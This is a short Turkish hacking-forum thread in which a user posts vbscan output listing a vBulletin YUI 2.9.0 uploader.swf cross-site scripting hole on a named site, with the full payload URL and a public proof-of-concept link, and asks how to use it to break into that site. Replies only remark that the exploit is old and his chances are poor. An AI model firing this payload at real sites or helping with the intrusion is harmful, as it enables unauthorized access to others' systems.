vbulletin açık (1 Viewer)

[TheNet]

herkese merhabalar vbscan ile tarattığım bir sitede şu açığı buldum:

[+] Checking vBulletin YUI 2.9.0 XSS
[++] uploader.swf is vulnerable
http://www.gizlimabet.com//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//
 POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html

bu açığı kullanarak nasıl bu siteye sızabilirim ? iyi çalışmalar

 

[IboCanReyis]

bu exploit 2013 den felan kalma değilmi

 

[TheNet]

aynen hocam

 

[haml3t]

senin iş yaş

 

[TheNet]

sebep ?